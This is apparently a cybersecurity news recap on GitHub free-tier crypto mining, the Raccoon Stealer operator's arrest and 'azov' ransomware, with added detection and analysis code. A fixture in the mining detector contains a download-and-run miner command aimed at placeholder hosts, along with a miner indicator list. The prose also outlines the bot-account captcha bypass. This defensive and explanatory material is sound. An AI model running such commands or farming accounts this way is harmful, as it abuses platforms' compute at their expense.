GitHub Free Plan Exploited by Crypto Miners; Raccoon Stealer Malware Operator Arrested

Cyber criminals are mining crypto on GitHub. A hacker whose death was faked has been arrested, and there's a new kind of ransomware which frames security researchers.

A massive crypto mining operation has been discovered which literally runs on GitHub. But how does that work? Well, GitHub has a feature which cybercriminals love: it allows developers to spin up a temporary virtual machine on GitHub's servers so they can automate tasks like code compilation and testing. But because this runs on a standard VM, it can be used to do almost anything, like mine crypto.

And the very second GitHub added 2,000 minutes per month of this compute power to its free tier, cyber criminals were all over it like moths to a lamp. However, there is a catch: whilst these VMs are fast enough for what they're designed for, they suck at crypto mining.

GitHub free plan

I mean, forget high performance GPUs: these things run on just 2 CPU cores, so mining is incredibly slow, which means miscreants have to be creative. In this latest campaign uncovered by researchers, the group behind it, which the researchers are calling "Purple Urchin" for some reason, created thousands of bot accounts, not just on GitHub but on other platforms which offer a free tier of a similar service.

The way the "Purple Urchin" group creates accounts is really quite clever: they use a load of different VPNs so each account is created under a different IP, and they use a special tool to automate mouse and keyboard actions when clicking through the account creation screen on GitHub's website. At this point only the captcha is standing in their way, but many captchas (GitHub's included) have an option for the visually impaired, which means listening to a bit of audio and typing out the numbers; "Purple Urchin" bypasses this with the help of a speech-to-text AI. And after this hurdle, "Purple Urchin" has another bot, so they don't have to lift a finger.
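From the platform's side, the pattern described above (brand-new accounts, scheduled workflows that do nothing CI-like and run until the job limit kills them) is what abuse teams look for. The following is an added example, not code from the article or from GitHub, of a heuristic triage over workflow-run records. The record layout and the sample data are constructed; the only platform facts it relies on are the 2,000 free minutes mentioned in the article and the documented 6-hour per-job limit on GitHub-hosted runners.

```python
"""Heuristic triage of CI workflow runs for crypto-mining abuse.

Constructed sample data; the scoring rules are illustrative, not GitHub's own.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Thresholds. 360 minutes is the documented per-job time limit on GitHub-hosted
# runners; 2,000 minutes/month is the free-tier allowance mentioned in the article.
JOB_CAP_MINUTES = 360
FREE_TIER_MINUTES = 2000
NEW_ACCOUNT_DAYS = 7

# Strings characteristic of miner tooling rather than builds or tests.
MINER_INDICATORS = ("stratum+tcp://", "stratum+ssl://", "xmrig", "--donate-level")
CI_KEYWORDS = ("checkout", "build", "test", "lint")


@dataclass
class WorkflowRun:
    account: str
    account_age_days: int
    schedule: Optional[str]     # cron expression if the workflow is scheduled
    minutes: int                # runner minutes consumed by this run
    commands: List[str] = field(default_factory=list)


def cron_is_high_frequency(expr: str) -> bool:
    """True when the minute field fires every minute or every N minutes (e.g. '*/5')."""
    minute = expr.split()[0]
    return minute == "*" or minute.startswith("*/")


def score_run(run: WorkflowRun) -> List[str]:
    """Return the abuse indicators that fire for a single run."""
    reasons = []
    if run.account_age_days < NEW_ACCOUNT_DAYS:
        reasons.append("new-account")
    # Builds and tests finish; miners run until the platform kills the job.
    if run.minutes >= JOB_CAP_MINUTES - 10:
        reasons.append("runs-to-job-cap")
    if run.schedule and cron_is_high_frequency(run.schedule):
        reasons.append("high-frequency-cron")
    joined = " ".join(run.commands).lower()
    if any(ind in joined for ind in MINER_INDICATORS):
        reasons.append("miner-indicator")
    if not any(kw in joined for kw in CI_KEYWORDS):
        reasons.append("no-ci-activity")
    return reasons


def triage(runs: List[WorkflowRun], min_reasons: int = 2) -> Dict[str, List[str]]:
    """Flag accounts with at least one run carrying min_reasons indicators.

    Also flags accounts whose combined minutes exceed the free-tier allowance,
    since burning the whole allowance is typical of mining, not of CI.
    """
    flagged: Dict[str, set] = {}
    minutes_by_account: Dict[str, int] = {}
    for run in runs:
        minutes_by_account[run.account] = minutes_by_account.get(run.account, 0) + run.minutes
        reasons = score_run(run)
        if len(reasons) >= min_reasons:
            flagged.setdefault(run.account, set()).update(reasons)
    for account, total in minutes_by_account.items():
        if total > FREE_TIER_MINUTES:
            flagged.setdefault(account, set()).add("exceeds-free-tier-minutes")
    return {acct: sorted(rs) for acct, rs in flagged.items()}


# Constructed sample: one maintainer's CI run, one new account with a short test
# run, and one account whose runs look like a miner (hosts are placeholders).
SAMPLE_RUNS = [
    WorkflowRun("maintainer-alice", 900, None, 12,
                ["actions/checkout@v3", "npm ci", "npm test"]),
    WorkflowRun("newcomer-bob", 2, None, 20, ["actions/checkout@v3", "pytest"]),
] + [
    WorkflowRun("user-7f3a21", 1, "*/10 * * * *", 355,
                ["curl -sL https://files.example.invalid/m -o m",
                 "./m -o stratum+tcp://pool.example.invalid:3333"])
    for _ in range(6)
]

if __name__ == "__main__":
    for account, reasons in triage(SAMPLE_RUNS).items():
        print(account, reasons)
```

A single indicator is not enough on its own (the brand-new account with a 20-minute test run is left alone); it is the combination of a fresh account, a frequent cron schedule and jobs that run right up to the cap that makes an account worth a look.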

After creating thousands of bots, "Purple Urchin" has an army to mine crypto. But they were mining really low profit margin coins, also known as "shitcoins". So it's thought this whole operation could just be a test, a precursor to a larger campaign where they might mine something like Monero. And let's assume that is the plan: just how much money would they make mining Monero on GitHub?

This is where it starts to get kinda ridiculous, because for every 1 Monero the cyber criminals mine on these VMs, it would cost GitHub over 100,000 dollars, simply because mining in a VM running on only a couple of CPU cores is incredibly inefficient. But "Purple Urchin" aren't footing the electricity bill here, so why would they care?

But an alternative theory is that they're targeting these small coins because it's easier to attack their underlying blockchain. When it comes to crypto, if you control 51% of a network's hashrate then you can control the entire network and validate arbitrary transactions, potentially stealing millions of dollars. This is much more doable on smaller, less relevant coins.
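The 51% figure is the point at which an attacker is guaranteed to win; the risk does not drop to zero below it. As an added example (not from the article), the code below evaluates the attacker-success formula from the Bitcoin whitepaper for a given hashrate share q and confirmation depth z, which goes slightly beyond the article by showing how much an attacker with, say, 30% of a small coin's hashrate can still achieve, and how many confirmations a recipient would need to wait for to keep that risk below a chosen level.

```python
"""Attacker success probability for a proof-of-work double-spend (Nakamoto model).

Added worked example; q is the attacker's share of network hashrate, z the
number of confirmations the recipient waits for.
"""
from math import exp, factorial


def attacker_success_probability(q: float, z: int) -> float:
    """Probability that an attacker with hashrate share q ever overtakes an
    honest chain that is z blocks ahead (the formula from the Bitcoin paper)."""
    if not 0.0 <= q <= 1.0 or z < 0:
        raise ValueError("q must be in [0, 1] and z >= 0")
    p = 1.0 - q
    if q >= p:
        # With half or more of the hashrate the attacker's chain wins with certainty.
        return 1.0
    lam = z * (q / p)   # expected attacker progress while honest miners mine z blocks
    prob = 1.0
    for k in range(z + 1):
        poisson = exp(-lam) * lam ** k / factorial(k)
        prob -= poisson * (1.0 - (q / p) ** (z - k))
    return prob


def confirmations_needed(q: float, max_risk: float) -> int:
    """Smallest number of confirmations that pushes the attacker's success
    probability below max_risk for a given hashrate share q."""
    if q >= 0.5:
        raise ValueError("no number of confirmations is safe against a majority")
    z = 0
    while attacker_success_probability(q, z) >= max_risk:
        z += 1
    return z


if __name__ == "__main__":
    # On a small coin, a few thousand hijacked CI runners can be a large share of q.
    for q in (0.1, 0.3, 0.45, 0.51):
        print(f"q={q:.2f}", [round(attacker_success_probability(q, z), 4) for z in range(7)])
    print("confirmations for q=0.3 at 0.1% risk:", confirmations_needed(0.3, 0.001))
```

With 10% of the hashrate an attacker overtakes a 1-block lead about a fifth of the time; with 30% they still have a 17% chance against five confirmations, and exchanges listing small coins compensate by demanding far more confirmations than they would for Bitcoin.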

Ever since the researchers published their findings, Purple Urchin's campaign has evaporated. Nevertheless, crypto mining using cloud services remains a huge problem for platforms. One such platform, Heroku, has announced that because their "security teams are spending an extraordinary amount of effort to manage fraud and abuse of their free product plans", they "plan to stop offering free product plans" altogether. And whilst GitHub has made some changes to its service to combat cryptomining abuse, it has kept its free tier, and so the cryptomining continues.

The alleged operator behind the notorious malware "Raccoon Stealer" has been arrested after his cyber criminal friends seemingly faked his death. Raccoon Stealer spawned in 2019, latching on to the 'malware as a service' trend.

The developers behind Raccoon Stealer don't infect anyone with it themselves; instead they rent it out to other cyber criminals on a subscription model, like a Netflix. For $200 per month, customers get a web interface where they can generate custom versions of Raccoon Stealer, manage the computers they've infected and, most importantly, retrieve stolen credentials. Because Raccoon Stealer is primarily an info stealer, after infecting a PC it'll exfiltrate saved passwords, credit cards, crypto wallets and so on; it can steal data from nearly 60 apps.

Unfortunately this malware is really noob friendly, as customers don't have to worry about operating their own servers or developing their own malware; they only have to deal with spreading it, whether that be with phishing emails, fake cracked software, or, in one case, a fake 'play to earn' game, 'Cthulhu World', set up with the sole intent of spreading this malware.

So Raccoon Stealer had become incredibly popular among cyber miscreants, but it crashed in March when the operators abruptly announced that they had to close the Raccoon Stealer project, because "due to the special operation", referring to the war in Ukraine, members of their team had been killed. They added that some of their servers had "already stopped responding". But it was all a lie, for different reasons.

The guy they're referring to as killed in the war is allegedly one "Mark Sokolovsky", apparently one of Raccoon Stealer's key developers. But far from dying in the war, he fled the country by bribing Ukrainian border guards (because of course there's currently a ban on men leaving Ukraine); he was then snapped crossing the border from Poland into Germany in his Porsche.

Mark Sokolovsky

He eventually arrived in Amsterdam with his girlfriend, who documented their little adventure on Instagram. He was arrested by Dutch police and is now facing extradition to the US on charges which could land him in prison for 20 years. But how did US authorities, the FBI, figure out his real identity? Court documents don't explain, but thanks to anonymous sources which tipped off a popular cyber security blog, it seems he made one tiny but fatal mistake.

Early on in his cyber crime career, under one of his pseudonyms, "Photix", he made a post on a cyber crime forum which referenced a certain Gmail account. The FBI discovered it was connected to an iCloud account, and at this point everything unravelled: the feds accessed it and found a bunch of incriminating evidence, including this picture, at which point they were probably just waiting for an opportunity to arrest him, which his trip to Amsterdam provided.

As for why his Raccoon Stealer team members faked his death: well, admitting that one of their main guys had been arrested and one of their servers had been seized by the FBI would be very bad for business. Shortly after they announced they were shutting down, they U-turned and said they were going offline to rework some code and to "expect them back in a few months". The FBI found over 50 million stolen credentials on the seized server, and they've launched a website where you can check if your email address is included in the data dump.

A strange new kind of ransomware has appeared, whose main purpose is to frame security researchers. Victims have been finding their files encrypted with the 'azov' file extension, and hidden within is a ransom note, seemingly perpetrated by some cyber criminal intent on extorting people out of a couple hundred dollars of Monero.

But not quite: the note starts with "Hello, my name is Hasherezade", a "Polish security expert", and says to "recover your files, contact us on Twitter", listing a bunch of Twitter accounts belonging to prominent cyber security researchers who have nothing to do with this ransomware.

This whole thing was specifically manufactured just to cause problems for these researchers, by some unknown person with a grudge against them for some reason. People on this list have reported that "victims have already started contacting them for help recovering files". The rest of the ransom note is about the war in Ukraine, claiming the purpose of this ransomware is "to bring your attention to the problem". So the people mentioned have nothing to do with the victims' files, and victims are pretty much out of luck.

And unfortunately it is quite easy for someone with way too much time on their hands to pull off an operation like this, as this malware isn't being spread by some sophisticated method: there's no phishing campaign and no vulnerabilities being taken advantage of. Instead the miscreant behind this has been taking the low effort approach of just buying installs on hacking forums, paying botnet operators to execute this malware on a number of their bots. And this is a lot cheaper than you'd expect, with botnet owners typically charging just 10 cents per install. So, armed with just a couple hundred dollars, someone could potentially cause havoc on thousands of computers.
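Because nothing in the note will get files back, the only useful defence is catching the encryption early, and the behaviour the article describes (one process renaming file after file to a new '.azov' extension) is exactly what endpoint tooling keys on. The following is an added example, not code from the article, of that detection over a file-activity log. The log line format and the sample lines are constructed; it is written to flag any newly appended extension, not just '.azov', since the next campaign will use a different one.

```python
"""Detect ransomware-style bulk renames in a file-activity log.

Added example with constructed log lines; the line format is assumed, not a
real EDR format. Flags any process that renames many files to the same newly
appended extension (such as '.azov') within a short window.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Dict, Iterable, Optional, Tuple

# Assumed log format: "<ISO timestamp> pid=<n> RENAME <old path> -> <new path>"
LINE_RE = re.compile(r"^(?P<ts>\S+) pid=(?P<pid>\d+) RENAME (?P<src>.+?) -> (?P<dst>.+)$")
WINDOW = timedelta(seconds=60)
THRESHOLD = 10                  # renames per process and extension inside WINDOW


def parse_line(line: str) -> Optional[Tuple[datetime, int, str, str]]:
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return ts, int(m["pid"]), m["src"], m["dst"]


def appended_extension(src: str, dst: str) -> Optional[str]:
    """Return the suffix tacked onto the original name (e.g. '.azov'), or None
    when the rename is not of the form <original> -> <original>.<ext>."""
    if dst.startswith(src) and len(dst) > len(src) + 1 and dst[len(src)] == ".":
        return dst[len(src):]
    return None


def detect_bursts(lines: Iterable[str], window: timedelta = WINDOW,
                  threshold: int = THRESHOLD) -> Dict[Tuple[int, str], datetime]:
    """Return {(pid, ext): time the burst crossed the threshold}."""
    recent: Dict[Tuple[int, str], deque] = defaultdict(deque)
    alerts: Dict[Tuple[int, str], datetime] = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, pid, src, dst = parsed
        ext = appended_extension(src, dst)
        if ext is None:
            continue
        key = (pid, ext)
        times = recent[key]
        times.append(ts)
        while times and ts - times[0] > window:   # slide the window forward
            times.popleft()
        if len(times) >= threshold and key not in alerts:
            alerts[key] = ts
    return alerts


# Constructed sample: two benign renames, then one process renaming twelve
# documents to *.azov over eleven seconds.
SAMPLE_LOG = [
    "2022-11-15T10:00:00Z pid=1200 RENAME C:\\Users\\a\\report.tmp -> C:\\Users\\a\\report.docx",
    "2022-11-15T10:00:02Z pid=2300 RENAME C:\\Users\\a\\notes.txt -> C:\\Users\\a\\notes.txt.bak",
] + [
    f"2022-11-15T10:00:{5 + i:02d}Z pid=4412 RENAME C:\\Users\\a\\doc{i}.docx -> C:\\Users\\a\\doc{i}.docx.azov"
    for i in range(12)
]

if __name__ == "__main__":
    for (pid, ext), when in detect_bursts(SAMPLE_LOG).items():
        print(f"ALERT pid={pid} renamed >= {THRESHOLD} files to {ext} by {when.isoformat()}Z")
```

The alert fires on the tenth rename, two files before the sample burst ends; in practice the threshold is tuned low enough to suspend the process while most of the user's files are still intact, and a single '.bak' rename from a backup tool never reaches it.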
